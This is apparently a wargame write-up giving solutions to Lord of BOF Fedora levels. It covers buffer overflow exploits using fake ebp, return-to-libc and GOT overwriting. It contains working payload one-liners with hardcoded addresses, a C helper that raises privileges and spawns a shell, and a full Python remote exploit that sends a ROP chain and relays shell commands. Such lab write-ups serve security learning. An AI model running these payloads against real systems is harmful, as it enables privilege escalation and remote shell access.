

[Lord Of Bof] Lord Of BOF Solutions ( Fedora 3 )

Solutions

Level 1


- upgraded simple buffer overflow 

; because of the operating system, there are some limits like random stack, ASLR, ASCII Armor, and other memory protections
; so we'd like to use an RTL or ROP attack rather than shellcode
; the hint is fake ebp, and I'll use fake ebp + RTL
; and use execve instead of system ; because an internal routine of the system function re-sets the geteuid value
; we need a program which elevates privilege and runs /bin/sh, because we can no longer use shellcode ; so use this program as execve's argv
; be careful: there is a random stack, so if we put some value on the stack its address will change every time, including execve's argv in the payload
; by using a ret instruction as the return address, we can advance eip

; Code : 
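#include <stdlib.h>
#include <unistd.h>

/*
 * Helper program launched by the execve call in the payload: it makes the
 * real uid match the effective uid and then starts a shell.  The header
 * names were lost in the original listing; setreuid()/geteuid() come from
 * <unistd.h> and system() from <stdlib.h>.
 */
int main(int argc, char *argv[]) {
    /* Bail out instead of spawning a shell if the uid change was refused. */
    if (setreuid(geteuid(), geteuid()) == -1)
        return 1;
    system("/bin/sh");
    return 0;
}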

; execve address : 0x007a5490 + 1 : 0x007a5491
; ret address : 0x08048441
; for the file name : 3c ed 83 ( this is what sits in execve's argv[0], so I link my get-shell program to this name and when execve runs, it'll run )
; payload : ln -s ./aaaa $(echo -en \x3c\xed\x83")
                : ./iron_golem $(python -c 'print "A"*268 + "\x41\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')

Level 2


- level 1 + can't deal with sfp 
 
; but the payload is the same as level 1 ; we didn't need to use the sfp area above the payload
; ret address : 0x080484b9
; payload : ./dark_eyes $(python -c 'print "A"*268 + "\xb9\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')

Level 3


- remote exploit + similar as level 2
 
; as we know, we can't use fake ebp, at least on the stack
; tip : the do_system function works like execve("/bin/sh", .. ,0), so if we just run this function, we'll get a shell! ( I just found it on the internet )
; do_system address : 0x0075077f
; payload : (python -c 'print "A"*268 + "\x7f\x07\x75\x00"'; cat) | nc localhost 7777

Level 4


- GOT overwriting problem

; to make this problem easy, this binary gives us a ppr gadget
; the payload form will be like this 
  A*268
  strcpy@plt ppr printf@got+0 system[address of 'first byte']
  strcpy@plt ppr printf@got+1 system[address of 'second byte']
  strcpy@plt ppr printf@got+2 system[address of 'third byte']
  strcpy@plt ppr printf@got+3 system[address  of 'fourth byte']
  printf@plt + A*4 + "/bin/sh"

; ppr address : 0x0804854c
; system address : 0x00 75 07 c0 ( we must find these bytes in a fixed area like the GOT ) ( I got the gadget addresses from another blog hahaha ) 
; strcpy@plt address : 0x08048494
; printf@got address : 0x08049884
; printf@plt address : 0x08048424
; /bin/sh address : 0x00833603
; payload : ./evil_wizard "$(python -c 'print "A"*268 +
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x84\x98\x04\x08" + "\x20\x84\x04\x08" +
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x85\x98\x04\x08" + "\x2c\x80\x04\x08" + 
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x86\x98\x04\x08" + "\xc8\x82\x04\x08" +
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x87\x98\x04\x08" + "\x2d\x80\x04\x08" +
 "\x24\x84\x04\x08" + "A"*4 + "\x03\x36\x83\x00"')"

Level 5


- level 4 + cleaning buffer + remote exploit 
 
; the payload is similar to the previous level ; and we'll use a custom stack for saving /bin/sh\0, one character at a time.
; ppr address : 0x080484f3
; gadgets for the system address : (got them from another blog haha)
; memcpy@got address : 0x08049850
; memcpy@plt address : 0x08048418
; custom stack address : 0x08049878
; strcpy@plt address : 0x08048438
; Python Code :

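from socket import AF_INET, SOCK_STREAM, socket
import os
import struct

# Target service (values from the original script).
HOST = "192.168.254.130"
PORT = 8888


def p(x):
    """Pack *x* as a little-endian 32-bit word (one stack slot)."""
    return struct.pack('<I', x)


# Gadget / symbol addresses in the target binary (values from the notes above).
ppr = 0x80484f3          # pop; pop; ret gadget
strcpy_plt = 0x8048438
memcpy_plt = 0x8048418
memcpy_got = 0x8049850   # GOT slot that gets overwritten with the system() address
cus_stack = 0x8049878    # writable "custom stack" that receives "/bin/sh\0"

# Addresses of single bytes whose values, copied in order into memcpy_got,
# form the system() address (the original author took them from another blog).
sys_1 = 0x80484d0
sys_2 = 0x804817c
sys_3 = 0x80482b4
sys_4 = 0x8048138

# Addresses of single bytes holding the characters of "/bin/sh".
# (Renamed from the original one-letter names: `s` used to be shadowed by the
# socket object further down.)
ch_slash = 0x8048114
ch_b = 0x8048117
ch_i = 0x8048116
ch_n = 0x804811e
ch_s = 0x8048746
ch_h = 0x80481b8

# Source byte for each position of "/bin/sh\0" on the custom stack.  The
# original reuses sys_4 as the terminator — NOTE(review): presumably that
# address holds a 0x00 byte; confirm against the binary.
BINSH_SOURCES = (ch_slash, ch_b, ch_i, ch_n, ch_slash, ch_s, ch_h, sys_4)


def write_byte(dst, src):
    """Return the four-word chain that copies one byte from *src* to *dst*.

    The chain is strcpy@plt, the ppr gadget (which pops the two arguments
    after strcpy returns), then the destination and source addresses.
    """
    return p(strcpy_plt) + p(ppr) + p(dst) + p(src)


def build_payload():
    """Build the 472-byte line sent to the service.

    Layout: 268 bytes of filler, four byte-copy chains that rewrite
    memcpy_got, eight byte-copy chains that place "/bin/sh\\0" on the
    custom stack, then a final memcpy@plt call with cus_stack as its argument.
    """
    payload = b"A" * 268
    # copy system address to memcpy_got, one byte per chain
    for off, src in enumerate((sys_1, sys_2, sys_3, sys_4)):
        payload += write_byte(memcpy_got + off, src)
    # copy /bin/sh\0 to the custom stack
    for off, src in enumerate(BINSH_SOURCES):
        payload += write_byte(cus_stack + off, src)
    # run it!  "A"*4 fills the return-address slot of the final call.
    payload += p(memcpy_plt) + b"A" * 4 + p(cus_stack)
    return payload


def interact(host=HOST, port=PORT):
    """Send the payload to *host*:*port* and relay commands interactively.

    The loop ends on EOF from stdin or when the remote side closes the
    connection; the socket is always closed (the original `s.close()` sat
    after an infinite loop and was unreachable).
    """
    try:
        read_line = raw_input  # Python 2 (the original's interpreter)
    except NameError:
        read_line = input  # Python 3
    sock = socket(AF_INET, SOCK_STREAM)
    try:
        sock.connect((host, port))
        # sendall avoids the short-write case that plain send() allows
        sock.sendall(build_payload() + b"\n")
        print(sock.recv(1024))
        while True:
            try:
                cmd = read_line('$ ')
            except EOFError:
                break
            sock.sendall(cmd.encode() + b"\n")
            reply = sock.recv(1024)
            if not reply:  # remote side closed the connection
                break
            # This line was mis-indented in the original and raised an
            # IndentationError before anything was sent.
            print(reply)
    finally:
        sock.close()


if __name__ == "__main__":
    interact()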


ALL CLEAR!


[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat ./*
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,' 
                   `'
[dark_stone@Fedora_1stFloor ~]$